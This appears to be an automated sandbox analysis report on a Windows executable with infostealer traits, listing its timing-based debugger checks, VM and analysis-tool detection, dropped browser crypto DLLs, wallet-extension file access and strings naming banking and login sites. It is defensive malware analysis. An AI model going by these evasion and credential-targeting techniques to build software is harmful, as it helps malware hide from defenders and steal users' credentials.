Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C8B7 second address: 86C8E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F6B3885AF28h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6B3885AF0Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86FBBA second address: 86FBC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889895 second address: 8898A9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6B3885AF06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89939A second address: 8993B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F6B38DFD066h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8981EC second address: 8981F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8981F0 second address: 8981F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8981F6 second address: 898206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F6B3885AF06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898206 second address: 898216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898216 second address: 898232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B3885AF18h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8983E4 second address: 8983E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898B3D second address: 898B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F6B3885AF06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898B55 second address: 898B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898B59 second address: 898B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898B5D second address: 898B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD077h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898CF9 second address: 898CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 898E49 second address: 898E62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007F6B38DFD066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F6B38DFD066h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89BC5B second address: 89BC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89BC61 second address: 89BC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89BEFF second address: 89BF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89C1B6 second address: 89C1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89C1BA second address: 89C1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A0BB7 second address: 8A0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0275 second address: 4EF0284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B3885AF0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0284 second address: 4EF02A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B38DFD071h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF02A0 second address: 4EF02A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF02A6 second address: 4EF02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF02AA second address: 4EF0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushfd 0x00000011 jmp 00007F6B3885AF0Bh 0x00000016 or eax, 65A1327Eh 0x0000001c jmp 00007F6B3885AF19h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 mov esi, ebx 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F6B3885AF13h 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0314 second address: 4EF031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF031A second address: 4EF0320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0320 second address: 4EF0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF035D second address: 4EF0394 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6B3885AF14h 0x00000008 jmp 00007F6B3885AF15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0394 second address: 4EF0398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0398 second address: 4EF039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF039E second address: 4EF03F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B38DFD070h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F6B38DFD077h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F6B38DFD076h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6B38DFD06Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF03F6 second address: 4EF0405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0405 second address: 4EF040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF040B second address: 4EF040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF040F second address: 4EF0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6B38DFD070h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0435 second address: 4EF0444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BFC1D second address: 7BFC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAD67 second address: 7BAD6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAD6D second address: 7BAD88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAD88 second address: 7BAD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAF70 second address: 7BAF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BAF74 second address: 7BAF86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B3885AF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F6B3885AF0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB1AD second address: 7BB1BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD06Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0B25 second address: 4EF0B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F6B3885AF13h 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0B54 second address: 4EF0B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD075h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B38DFD073h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0B85 second address: 4EF0B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0B89 second address: 4EF0B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0B8F second address: 4EF0BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6B3885AF0Eh 0x00000011 xor esi, 0DDF94D8h 0x00000017 jmp 00007F6B3885AF0Bh 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov dx, A052h 0x00000029 mov ecx, edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0BD9 second address: 4EF0BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0BDF second address: 4EF0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 601B8C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7D769F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7B6AD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 83CF09 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003B4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003ADA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003AE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_003ABE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003AF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_003B3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003A16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003B38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003AED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_003B4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003ADE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003A1160 GetSystemInfo,ExitProcess,

0_2_003A1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: KEGDAKEH.0.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: KEGDAKEH.0.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: KEGDAKEH.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: KEGDAKEH.0.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: KEGDAKEH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: KEGDAKEH.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: KEGDAKEH.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: KEGDAKEH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: KEGDAKEH.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWN
Source: KEGDAKEH.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: KEGDAKEH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: KEGDAKEH.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KEGDAKEH.0.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: KEGDAKEH.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: KEGDAKEH.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: KEGDAKEH.0.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: KEGDAKEH.0.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: file.exe, 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: KEGDAKEH.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: KEGDAKEH.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: KEGDAKEH.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58568
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58571
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58583
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59758
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58591
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58622

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCF5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CCF5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003A45C0 VirtualProtect ?,00000004,00000100,00000000

